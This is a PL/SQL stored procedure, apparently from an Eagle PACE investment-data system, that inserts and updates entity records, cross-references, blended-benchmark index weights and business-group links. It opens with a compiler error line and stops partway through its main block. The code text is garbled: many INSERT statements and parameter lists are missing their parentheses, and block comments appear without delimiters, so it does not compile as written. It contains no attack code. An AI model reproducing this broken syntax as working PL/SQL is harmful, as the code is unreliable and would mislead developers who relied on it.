    PL/SQL: Statement ignored
    PROCEDURE ENTPRFMAN
    p_source_acct_id char, /*1*/
    p_source_system char, /*2*/
    p_entity_name char, /*3*/
    p_entity_legal_name char, /*4*/
    p_entity_long_name char, /*5*/
    p_associated_entity_id char, /*6*/
    p_entity_type char, /*7*/
    p_list_order char, /*8*/
    p_tax_id_number char, /*9*/
    p_inception_date char, /*10*/
    p_fiscal_end_date char, /*11*/
    p_marketing_open_date char, /*12*/
    p_base_currency char, /*13*/
    p_account_status char, /*14*/
    p_entity_code char, /*15*/
    p_orig_source_system char, /*16*/
    p_account_legal_form char, /*17*/
    p_business_sector char, /*18*/
    p_direct_account_ind char, /*19*/
    p_portfolio_type_code char, /*20*/
    p_target_dict_name char, /*21*/
    p_dict_level char, /*22*/
    p_cust_indx_type char, /*23*/
    p_blnd_source char, /*24*/
    p_ml_interpolate_yn char, /*25*/
    p_source_level1 char, /*26*/
    p_source_entity_xref1 char, /*27*/
    p_source_entity_xref1_type char, /*28*/
    p_source_dict_name1 char, /*29*/
    p_weight1 char, /*30*/
    p_source_level2 char, /*31*/
    p_source_entity_xref2 char, /*32*/
    p_source_entity_xref2_type char, /*33*/
    p_source_dict_name2 char, /*34*/
    p_weight2 char, /*35*/
    p_source_level3 char, /*36*/
    p_source_entity_xref3 char, /*37*/
    p_source_entity_xref3_type char, /*38*/
    p_source_dict_name3 char, /*39*/
    p_weight3 char, /*40*/
    p_source_level4 char, /*41*/
    p_source_entity_xref4 char, /*42*/
    p_source_entity_xref4_type char, /*43*/
    p_source_dict_name4 char, /*44*/
    p_weight4 char, /*45*/
    p_source_level5 char, /*46*/
    p_source_entity_xref5 char, /*47*/
    p_source_entity_xref5_type char, /*48*/
    p_source_dict_name5 char, /*49*/
    p_weight5 char, /*50*/
    p_source_level6 char, /*51*/
    p_source_entity_xref6 char, /*52*/
    p_source_entity_xref6_type char, /*53*/
    p_source_dict_name6 char, /*54*/
    p_weight6 char, /*55*/
    p_source_level7 char, /*56*/
    p_source_entity_xref7 char, /*57*/
    p_source_entity_xref7_type char, /*58*/
    p_source_dict_name7 char, /*59*/
    p_weight7 char, /*60*/
    p_source_level8 char, /*61*/
    p_source_entity_xref8 char, /*62*/
    p_source_entity_xref8_type char, /*63*/
    p_source_dict_name8 char, /*64*/
    p_weight8 char, /*65*/
    p_source_level9 char, /*66*/
    p_source_entity_xref9 char, /*67*/
    p_source_entity_xref9_type char, /*68*/
    p_source_dict_name9 char, /*69*/
    p_weight9 char, /*70*/
    p_source_level10 char, /*71*/
    p_source_entity_xref10 char, /*72*/
    p_source_entity_xref10_type char, /*73*/
    p_source_dict_name10 char, /*74*/
    p_weight10 char, /*75*/
    p_OUT OUT char
    AS
    v_date rulesdbo.entity.upd_date%TYPE:= SYSDATE;
    v_update_source rulesdbo.entity.upd_user%TYPE:= 'PRFENT';
    v_entity_id rulesdbo.entity.entity_id%type;
    b_valid BOOLEAN;
    /* Supported Entity Types - Index Index */
    v_sb_entity_type rulesdbo.entity.entity_type%type:= 'INDX';
    v_bb_entity_type rulesdbo.entity.entity_type%type:= 'CIDX';
    v_bb_dict_l1_cv rulesdbo.dictionary_detail.dict_l1_code_value%type := 'TOTAL';
    na_outparam EagleGen.t_outparam;
    /* Constants */
    g_prf_intfc rulesdbo.entity.src_intfc_inst%type:= -1;
    v_src_intfc_inst rulesdbo.entity.src_intfc_inst%type:= -1;
    /* Business Groups */
    v_group_name1 pace_masterdbo.pace_user_groups.group_name%type := 'ASP Reporting Grp';
    v_group_name2 pace_masterdbo.pace_user_groups.group_name%type := 'Client Rptg Grp';
    v_group_name3 pace_masterdbo.pace_user_groups.group_name%type := 'Client Rptg Mgr Grp';
    v_group_name4 pace_masterdbo.pace_user_groups.group_name%type := 'Client Srvc Grp';
    v_group_name5 pace_masterdbo.pace_user_groups.group_name%type := 'Client Srvc Mgr Grp';
    v_group_name6 pace_masterdbo.pace_user_groups.group_name%type := 'Data Mgmt Grp';
    v_group_name7 pace_masterdbo.pace_user_groups.group_name%type := 'Data Services Grp';
    v_group_name8 pace_masterdbo.pace_user_groups.group_name%type := 'Dom Operations (FDS)';
    v_group_name9 pace_masterdbo.pace_user_groups.group_name%type := 'QA Portfolio Mgr Grp';
    v_group_name10 pace_masterdbo.pace_user_groups.group_name%type := 'SRS (LPS) Group';
    v_group_name11 pace_masterdbo.pace_user_groups.group_name%type := 'LG Cap Val PM Group';
    v_group_name12 pace_masterdbo.pace_user_groups.group_name%type := 'APL Large Cap Value';
    v_group_name13 pace_masterdbo.pace_user_groups.group_name%type := 'Small Cap PM Grp';
    v_group_name14 pace_masterdbo.pace_user_groups.group_name%type := 'Client Rptg Dev Grp';
    v_entity_name rulesdbo.entity.entity_name%type; -- HX 17MAR05
    ** Checks to see if entity exists
    PROCEDURE validate_entityid(p_acctid IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_acctid_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    l_entity_id OUT rulesdbo.entity_xreference.entity_id%TYPE,
    b_valid OUT BOOLEAN)
    IS
    BEGIN
    select ex.entity_id into l_entity_id
    from rulesdbo.entity_xreference ex, rulesdbo.entity e
    where ex.xref_account_id = trim(p_acctid)
    and ex.xref_account_id_type = trim(p_acctid_type)
    and ex.entity_id = e.entity_id;
    b_valid:=TRUE;
    EXCEPTION
    WHEN NO_DATA_FOUND THEN
    b_valid:=TRUE;
    l_entity_id:=null;
    dbms_output.put_line('IN ENTITY VALIDATE no data');
    WHEN OTHERS THEN
    dbms_output.put_line('IN ENTITY VALIDATE ERROR');
    b_valid:=FALSE;
    END; -- validate entity id func ends here
    ** Checks to see if entity xref exists, if not then add xref
    FUNCTION entity_xref(p_acctid rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_acctid_type rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_entity_id rulesdbo.entity_xreference.entity_id%TYPE)
    RETURN BOOLEAN
    AS
    l_count NUMBER:=0;
    v_entity_xref_id rulesdbo.entity_xreference.instance%type;
    BEGIN
    select count(*) into l_count
    from rulesdbo.entity_xreference
    where xref_account_id = trim(p_acctid)
    and xref_account_id_type = trim(p_acctid_type);
    if l_count > 0 then
    UPDATE rulesdbo.entity_xreference
    SET update_date = v_date,
    update_source = v_update_source,
    entity_id = p_entity_id
    WHERE xref_account_id = trim(p_acctid)
    AND xref_account_id_type = trim(p_acctid_type);
    RETURN TRUE;
    else
    pace_masterdbo.getnextinstance('RULESDBO.ENTITY_XREFERENCE',1,v_entity_xref_id);
    INSERT INTO rulesdbo.entity_xreference
    instance, update_date, update_source, entity_id, xref_account_id, xref_account_id_type
    VALUES
    v_entity_xref_id, v_date, v_update_source, p_entity_id, trim(p_acctid), trim(p_acctid_type)
    RETURN TRUE;
    end if;
    EXCEPTION
    WHEN OTHERS THEN
    RETURN FALSE;
    END; -- entity_xref func ends here
    ** Finds dictionary_id given dictionary_name
    FUNCTION getDictionaryId(p_dict_name IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_dict_id OUT rulesdbo.dictionaries.dictionary_id%TYPE)
    RETURN BOOLEAN
    AS
    v_dict_id rulesdbo.dictionaries.dictionary_id%type;
    v_dict_name rulesdbo.dictionaries.dictionary_name%type;
    BEGIN
    dbms_output.put_line('dictionary_name = '||p_dict_name);
    --trim input
    v_dict_name := trim(p_dict_name);
    select dictionary_id into v_dict_id
    from rulesdbo.dictionaries
    where dictionary_name = v_dict_name;
    dbms_output.put_line('dictionary_id = '||v_dict_id);
    if v_dict_id is not null then
    p_dict_id := v_dict_id;
    RETURN TRUE;
    else
    p_dict_id := NULL;
    RETURN FALSE;
    end if;
    EXCEPTION
    WHEN OTHERS THEN
    RETURN FALSE;
    END; -- getDictionaryId func ends here
    ** Finds dictionary_detail_id given dictionary_name
    FUNCTION getDictionaryItemId(p_dict_id IN rulesdbo.dictionary_detail.dictionary_id%TYPE,
    p_dict_l1_code_value IN rulesdbo.dictionary_detail.dict_l1_code_value%TYPE,
    p_dict_l2_code_value IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_dict_item_id OUT rulesdbo.dictionary_detail.dictionary_item_id%TYPE)
    RETURN BOOLEAN
    AS
    v_dict_item_id rulesdbo.dictionary_detail.dictionary_item_id%type;
    v_dict_l1 rulesdbo.dictionary_detail.dict_l1_code_value%TYPE;
    v_dict_l2 rulesdbo.dictionary_detail.dict_l2_code_value%TYPE;
    BEGIN
    --trim input
    v_dict_l1 := trim(p_dict_l1_code_value);
    v_dict_l2 := trim(p_dict_l2_code_value);
    /* Total Level Only dictionary custom logic */
    if v_dict_l2 <> 'TOTAL' then
    select dictionary_item_id into v_dict_item_id
    from rulesdbo.dictionary_detail
    where dictionary_id = p_dict_id
    and dict_l1_code_value = v_dict_l1
    and dict_l2_code_value = v_dict_l2;
    else
    select dictionary_item_id into v_dict_item_id
    from rulesdbo.dictionary_detail
    where dictionary_id = p_dict_id
    and dict_l1_code_value = v_dict_l1
    and dict_l2_code_value is null;
    end if;
    if v_dict_item_id is not null then
    p_dict_item_id := v_dict_item_id;
    RETURN TRUE;
    else
    p_dict_item_id := NULL;
    RETURN FALSE;
    end if;
    EXCEPTION
    WHEN OTHERS THEN
    RETURN FALSE;
    END; -- getDictionaryDetailId func ends here
    ** Finds instance for given source short_desc
    FUNCTION getSourceId(p_source_name IN pace_masterdbo.interfaces.short_desc%TYPE,
    p_source_id OUT pace_masterdbo.interfaces.instance%TYPE)
    RETURN BOOLEAN
    AS
    v_source_id pace_masterdbo.interfaces.instance%TYPE;
    v_source_name pace_masterdbo.interfaces.short_desc%TYPE;
    BEGIN
    --trim input
    v_source_name := trim(p_source_name);
    select instance into v_source_id
    from pace_masterdbo.interfaces
    where short_desc = v_source_name;
    if v_source_id is not null then
    p_source_id := v_source_id;
    RETURN TRUE;
    else
    p_source_id := NULL;
    RETURN FALSE;
    end if;
    EXCEPTION
    WHEN OTHERS THEN
    RETURN FALSE;
    END; -- getSourceId func ends here
    ** Finds entity_id given xref_account_id
    FUNCTION getEntityId( p_account_id IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_account_id_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_entity_id OUT rulesdbo.entity_xreference.entity_id%TYPE)
    RETURN BOOLEAN
    AS
    v_entity_id rulesdbo.entity_xreference.entity_id%TYPE;
    v_account_id rulesdbo.entity_xreference.xref_account_id%TYPE;
    v_account_id_type rulesdbo.entity_xreference.xref_account_id_type%TYPE;
    BEGIN
    --trim input
    v_account_id := trim(p_account_id);
    v_account_id_type := trim(p_account_id_type);
    select entity_id into v_entity_id
    from rulesdbo.entity_xreference
    where xref_account_id = v_account_id
    and xref_account_id_type = v_account_id_type;
    if v_entity_id is not null then
    p_entity_id := v_entity_id;
    RETURN TRUE;
    else
    p_entity_id := NULL;
    RETURN FALSE;
    end if;
    EXCEPTION
    WHEN OTHERS THEN
    RETURN FALSE;
    END; -- getEntityId func ends here
    ** FOR BLENDED BENCHMARKS ONLY
    FUNCTION processLevel( p_level_id IN NUMBER,
    p_blend_entity_id IN rulesdbo.entity.entity_id%TYPE,
    p_target_dict_id IN rulesdbo.dictionaries.dictionary_id%TYPE,
    p_dict_level IN rulesdbo.custom_index_attributes.dict_level%TYPE,
    p_dict_l2_code_value1 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref1 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref1_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname1 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight1 IN rulesdbo.custom_index_attributes.weight%TYPE
    RETURN BOOLEAN
    AS
    l_count NUMBER:=0;
    v_instance rulesdbo.custom_index_attributes.instance%TYPE;
    v_source_dict_id rulesdbo.custom_index_attributes.source_dict_id%TYPE;
    v_entity_id rulesdbo.entity.entity_id%TYPE;
    v_src_intfc_inst rulesdbo.custom_index_attributes.src_intfc_inst%TYPE;
    v_target_dict_item_id rulesdbo.custom_index_attributes.target_dict_item_id%TYPE;
    b_valid BOOLEAN;
    BEGIN
    b_valid := getSourceId('EAGLE PACE', v_src_intfc_inst);
    dbms_output.put_line('Source Id = '||v_src_intfc_inst);
    b_valid := getEntityId(p_entity_xref1, p_entity_xref1_type, v_entity_id);
    dbms_output.put_line('Level Entity Xref = '||p_entity_xref1);
    dbms_output.put_line('Level Entity Id = '||v_entity_id);
    IF NOT b_Valid THEN
    na_outparam(na_outparam.COUNT+1) := EagleGen.GetErrEdit(p_Src => v_src_intfc_inst,
    p_ShortDesc => 'ENTITY NF');
    p_OUT := EagleGen.simf_table_to_varchar(na_outparam);
    RETURN FALSE;
    END IF;
    b_valid := getDictionaryId(p_source_dictname1, v_source_dict_id);
    dbms_output.put_line('Level Dictionary Id = '||v_source_dict_id);
    IF NOT b_Valid THEN
    na_outparam(na_outparam.COUNT+1) := EagleGen.GetErrEdit(p_Src => v_src_intfc_inst,
    p_ShortDesc => 'DICT ID NF');
    p_OUT := EagleGen.simf_table_to_varchar(na_outparam);
    RETURN FALSE;
    END IF;
    b_valid := getDictionaryItemId(p_target_dict_id, v_bb_dict_l1_cv, p_dict_l2_code_value1, v_target_dict_item_id);
    dbms_output.put_line('Dictionary Item Id = '||v_target_dict_item_id);
    IF NOT b_Valid THEN
    na_outparam(na_outparam.COUNT+1) := EagleGen.GetErrEdit(p_Src => v_src_intfc_inst,
    p_ShortDesc => 'DIR NF');
    p_OUT := EagleGen.simf_table_to_varchar(na_outparam);
    RETURN FALSE;
    END IF;
    /* initial delete */
    if p_level_id = 1 then
    dbms_output.put_line('Deleting ALL prior blend info');
    DELETE FROM rulesdbo.custom_index_attributes
    WHERE entity_id = p_blend_entity_id
    and target_dict_id = p_target_dict_id
    and source_dict_id = v_source_dict_id
    and dict_level = p_dict_level;
    end if;
    /* verify level */
    if p_dict_l2_code_value1 is not null then
    if (v_entity_id is not null) then
    if (v_source_dict_id is not null) then
    if (p_weight1 is not null) then
    dbms_output.put_line('*** LEVEL '||p_level_id||' - INSERTING NEW RECORD INTO RULESDBO.CUSTOM_INDEX_ATTRIBUTES');
    pace_masterdbo.getnextinstance('RULESDBO.CUSTOM_INDEX_ATTRIBUTES',1,v_instance);
    dbms_output.put_line('Retrieved instance number = '||v_instance);
    /* insert row */
    INSERT INTO rulesdbo.custom_index_attributes (
    instance, effective_date, entity_id, entity_detail_id, target_dict_id, source_dict_id,
    dict_level, dict_level_value, weight, cust_indx_type, src_intfc_inst, update_date,
    update_source, target_dict_item_id
    VALUES (
    v_instance, trunc(v_date), p_blend_entity_id, v_entity_id, p_target_dict_id, v_source_dict_id,
    p_dict_level, substr(p_dict_l2_code_value1, 1, 30), p_weight1, substr(p_cust_indx_type, 1, 4),
    v_src_intfc_inst, v_date, v_update_source, v_target_dict_item_id
    b_valid := TRUE;
    RETURN TRUE;
    end if;
    end if;
    end if;
    end if;
    RETURN FALSE;
    EXCEPTION
    WHEN OTHERS THEN
    dbms_output.put_line('ERRROR - '||sqlerrm);
    RETURN NULL;
    END; -- processLevel func ends here
    FUNCTION customIndexAttributes(
    p_blend_entity_id IN rulesdbo.entity.entity_id%TYPE,
    p_target_dictname IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_dict_l2_code_value1 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref1 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref1_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname1 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight1 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value2 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref2 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref2_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname2 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight2 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value3 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref3 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref3_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname3 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight3 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value4 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref4 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref4_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname4 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight4 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value5 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref5 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref5_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname5 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight5 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value6 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref6 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref6_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname6 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight6 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value7 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref7 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref7_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname7 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight7 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value8 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref8 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref8_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname8 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight8 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value9 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref9 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref9_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname9 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight9 IN rulesdbo.custom_index_attributes.weight%TYPE,
    p_dict_l2_code_value10 IN rulesdbo.dictionary_detail.dict_l2_code_value%TYPE,
    p_entity_xref10 IN rulesdbo.entity_xreference.xref_account_id%TYPE,
    p_entity_xref10_type IN rulesdbo.entity_xreference.xref_account_id_type%TYPE,
    p_source_dictname10 IN rulesdbo.dictionaries.dictionary_name%TYPE,
    p_weight10 IN rulesdbo.custom_index_attributes.weight%TYPE
    RETURN BOOLEAN
    AS
    l_count NUMBER:=0;
    v_instance rulesdbo.custom_index_attributes.instance%TYPE;
    v_target_dict_id rulesdbo.custom_index_attributes.target_dict_id%TYPE;
    v_source_dict_id rulesdbo.custom_index_attributes.source_dict_id%TYPE;
    v_entity_id rulesdbo.entity.entity_id%TYPE;
    v_entity_detail_id rulesdbo.entity_detail.entity_detail_id%TYPE;
    b_valid BOOLEAN;
    BEGIN
    dbms_output.put_line('TRYING TO INSERT NEW RECORD INTO RULESDBO.CUSTOM_INDEX_ATTRIBUTES');
    b_valid := getDictionaryId(p_target_dictname, v_target_dict_id);
    dbms_output.put_line('Target Dictionary Id = '||v_target_dict_id);
    -- process level 1
    if p_dict_l2_code_value1 is not null then
    dbms_output.put_line('Trying to process level 1');
    b_valid := processLevel(1,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value1,p_entity_xref1,p_entity_xref1_type,
    p_source_dictname1,p_weight1);
    end if;
    -- process level 2
    if p_dict_l2_code_value2 is not null then
    dbms_output.put_line('Trying to process level 2');
    b_valid := processLevel(2,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value2,p_entity_xref2,p_entity_xref2_type,
    p_source_dictname2,p_weight2);
    end if;
    -- process level 3
    if p_dict_l2_code_value3 is not null then
    dbms_output.put_line('Trying to process level 3');
    b_valid := processLevel(3,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value3,p_entity_xref3,p_entity_xref3_type,
    p_source_dictname3,p_weight3);
    end if;
    -- process level 4
    if p_dict_l2_code_value4 is not null then
    dbms_output.put_line('Trying to process level 4');
    b_valid := processLevel(4,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value4,p_entity_xref4,p_entity_xref4_type,
    p_source_dictname4,p_weight4);
    end if;
    -- process level 5
    if p_dict_l2_code_value5 is not null then
    dbms_output.put_line('Trying to process level 5');
    b_valid := processLevel(5,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value5,p_entity_xref5,p_entity_xref5_type,
    p_source_dictname5,p_weight5);
    end if;
    -- process level 6
    if p_dict_l2_code_value6 is not null then
    dbms_output.put_line('Trying to process level 6');
    b_valid := processLevel(6,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value6,p_entity_xref6,p_entity_xref6_type,
    p_source_dictname6,p_weight6);
    end if;
    -- process level 7
    if p_dict_l2_code_value7 is not null then
    dbms_output.put_line('Trying to process level 7');
    b_valid := processLevel(7,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value7,p_entity_xref7,p_entity_xref7_type,
    p_source_dictname7,p_weight7);
    end if;
    -- process level 8
    if p_dict_l2_code_value8 is not null then
    dbms_output.put_line('Trying to process level 8');
    b_valid := processLevel(8,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value8,p_entity_xref8,p_entity_xref8_type,
    p_source_dictname8,p_weight8);
    end if;
    -- process level 9
    if p_dict_l2_code_value9 is not null then
    dbms_output.put_line('Trying to process level 9');
    b_valid := processLevel(9,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value9,p_entity_xref9,p_entity_xref9_type,
    p_source_dictname9,p_weight9);
    end if;
    -- process level 10
    if p_dict_l2_code_value10 is not null then
    dbms_output.put_line('Trying to process level 10');
    b_valid := processLevel(10,p_blend_entity_id,v_target_dict_id,p_dict_level,
    p_dict_l2_code_value10,p_entity_xref10,p_entity_xref10_type,
    p_source_dictname10,p_weight10);
    end if;
    RETURN b_valid;
    EXCEPTION
    WHEN OTHERS THEN
    dbms_output.put_line('ERRROR - '||sqlerrm);
    RETURN NULL;
    END; -- customIndexAttributes func ends here
    ** if record in entity Detail exists add else update master entity id
    ** benchmark entity_id = p_mast_entity_id
    ** portfolio entity_id = p_feed_entity_id
    FUNCTION entityDetail( p_mast_entity_id rulesdbo.entity_detail.entity_detail_id%TYPE,
    p_feed_entity_id rulesdbo.entity_detail.entity_id%TYPE,
    p_entity_type rulesdbo.entity_detail.entity_type%TYPE,
    p_list_order rulesdbo.entity_detail.list_order%TYPE)
    RETURN BOOLEAN
    AS
    l_count NUMBER:=0;
    a_count NUMBER:=0;
    BEGIN
    /* if blended benchmark don't need record in ENTITY_DETAIL */
    if (p_entity_type = v_bb_entity_type) then
    return TRUE;
    end if;
    select count(*) into l_count
    from rulesdbo.entity_detail
    where entity_id = p_feed_entity_id
    and entity_type = p_entity_type
    and entity_detail_id = p_mast_entity_id;
    if l_count > 0 then
    dbms_output.put_line('UPDATING EXISTING RECORD IN RULESDBO.ENTITY_DETAIL');
    UPDATE rulesdbo.entity_detail
    SET
    update_date = v_date,
    update_user = v_update_source,
    src_intfc_inst = v_src_intfc_inst,
    list_order = p_list_order
    WHERE
    entity_detail_id = p_mast_entity_id
    AND entity_id = p_feed_entity_id
    AND entity_type = p_entity_type;
    RETURN TRUE;
    else
    /* validate associated entity_id */
    dbms_output.put_line('VALIDATING ASSOCIATED ENTITY_ID');
    dbms_output.put_line('p_feed_entity_id ' || p_feed_entity_id);
    select count(*) into a_count
    from rulesdbo.entity
    where entity_id = p_feed_entity_id;
    if a_count > 0 then
    dbms_output.put_line('INSERTING NEW RECORD INTO RULESDBO.ENTITY_DETAIL');
    INSERT INTO rulesdbo.entity_detail
    entity_detail_id, entity_id, entity_type, update_date, update_user, src_intfc_inst, list_order
    VALUES
    p_mast_entity_id, p_feed_entity_id, p_entity_type, v_date, v_update_source, v_src_intfc_inst, p_list_order
    RETURN TRUE;
    else
    IF p_feed_entity_id is not null then
    --For invalid, non-null associated_entity_id
    RETURN FALSE;
    END IF;
    --For invalid, null associate_entity_id
    return TRUE;
    end if;
    return TRUE;
    end if;
    EXCEPTION
    WHEN OTHERS THEN
    RETURN FALSE;
    END; -- entityDetail func ends here
    ** FOR BUSINESS GROUPS
    FUNCTION setBusinessGroup
    ( p_group_name pace_masterdbo.pace_user_groups.group_name%TYPE,
    p_entity_id rulesdbo.entity.entity_id%TYPE,
    p_upd_user pace_masterdbo.pace_user_groups.upd_user%TYPE,
    p_upd_datetime pace_masterdbo.pace_user_groups.upd_datetime%TYPE
    RETURN BOOLEAN
    AS
    g_count NUMBER:=0;
    v_group_id pace_masterdbo.pace_user_groups.group_id%TYPE;
    BEGIN
    /* validate that business group is found */
    select count(*) into g_count
    from pace_masterdbo.pace_user_groups
    where group_name = p_group_name;
    if g_count <= 0 then
    dbms_output.put_line('BUSINESS GROUP NOT FOUND - ' || p_group_name);
    return FALSE;
    end if;
    /* get group_id for given group name */
    select group_id into v_group_id
    from pace_masterdbo.pace_user_groups
    where group_name = p_group_name;
    /* check if record already exists in group_entities */
    select count(*) into g_count
    from pace_masterdbo.group_entities
    where group_id = v_group_id
    and entity_id = p_entity_id;
    if g_count > 0 then
    /* update record */
    UPDATE pace_masterdbo.group_entities
    SET upd_user = p_upd_user,
    upd_datetime = p_upd_datetime
    WHERE group_id = v_group_id
    AND entity_id = p_entity_id;
    dbms_output.put_line('UPDATED RECORD FOR BUSINESS GROUP - ' || p_group_name);
    else
    /* insert record */
    INSERT INTO pace_masterdbo.group_entities
    ( group_id, entity_id, upd_user, upd_datetime )
    VALUES
    ( v_group_id, p_entity_id, p_upd_user, p_upd_datetime );
    dbms_output.put_line('INSERTED NEW RECORD FOR BUSINESS GROUP - ' || p_group_name);
    end if;
    RETURN TRUE;
    EXCEPTION
    WHEN OTHERS THEN
    RETURN FALSE;
    END; -- setBusinessGroup func ends here
    ** MAIN
    BEGIN
    -- HX 17MAR05
    v_entity_name := substr(p_entity_name,1,30);
    v_entity_name := translate(v_entity_name,'/\:*?"<>~`!^|;,.''',' ');
    b_valid := getSourceId('EAGLE PACE', g_prf_intfc);
    dbms_output.put_line('Global Source Id = '||g_prf_intfc);
    validate_entityid(p_source_acct_id,p_source_system,v_entity_id, b_valid);
    IF NOT b_Valid THEN
    na_outparam(na_outparam.COUNT+1) := EagleGen.GetErrEdit(p_Src => g_prf_intfc,
    p_ShortDesc => 'INV ENTITY');
    p_OUT := EagleGen.simf_table_to_varchar(na_outparam);
    RETURN;
    END IF;
    if v_entity_id is not null then
    dbms_output.put_line('ENTITY ID EXISTS - ' || v_entity_id);
    /*Update Record in Entity Table */
    UPDATE rulesdbo.entity
    SET entity_type = p_entity_type,
    entity_name = v_entity_name,
    entity_long_name = substr(p_entity_long_name,1,60),
    legal_name = p_entity_legal_name,
    inception_date = to_date(p_inception_date, 'YYYYMMDD'),
    marketing_open_date = to_date(p_marketing_open_date, 'YYYYMMDD'),
    fiscal_end_date = to_date(p_fiscal_end_date, 'YYYYMMDD'),
    tax_id_number = p_tax_id_number,
    upd_date = v_date,
    upd_user = v_update_source,
    base_currency = p_base_currency,
    account_status = p_account_status,
    entity_code = p_entity_code,
    orig_source_system = p_orig_source_system,
    account_legal_form = p_account_legal_form,
    business_sector = p_business_sector,
    direct_account_ind = p_direct_account_ind,
    portfolio_type_code = p_portfolio_type_code,
    ml_interpolate_yn = p_ml_interpolate_yn
    WHERE entity_id = v_entity_id;
    dbms_output.put_line('UPDATED EXISTING RULESDBO.ENTITY RECORD');
    b_valid := entityDetail(v_entity_id, p_associated_entity_id, p_entity_type, p_list_order);
    else
    pace_masterdbo.getnextinstance('RULESDBO.ENTITY',1,v_entity_id);
    /*Insert Record into Entity Table */
    INSERT INTO rulesdbo.entity
    entity_id, entity_type, entity_name,entity_long_name,legal_name,inception_date,marketing_open_date,
    upd_date, upd_user, tax_id_number, fiscal_end_date, base_currency, account_status,
    entity_code, orig_source_system, account_legal_form, business_sector, direct_account_ind,
    portfolio_type_code, ml_interpolate_yn
    VALUES
    ( v_entity_id, p_entity_type,v_entity_name,substr(p_entity_long_name,1,60),p_entity_legal_name,
    to_date(p_inception_date, 'YYYYMMDD'),to_date(p_marketing_open_date, 'YYYYMMDD'),v_date, v_update_source, p_tax_id_number, to_date(p_fiscal_end_date, 'YYYYMMDD'),
    p_base_currency, p_account_status, p_entity_code, p_orig_source_system, p_account_legal_form, p_business_sector,
    p_direct_account_ind, p_portfolio_type_code, p_ml_interpolate_yn
    dbms_output.put_line('ENTITY ID CREATED - ' || v_entity_id);
    /*Insert Record into Entity_Detail Table */
    b_valid := entityDetail(v_entity_id, p_associated_entity_id, p_entity_type, p_list_order);
    end if;
    /* Insert/Update CUSTOM_INDEX_ATTRIBUTES if blended benchmark */
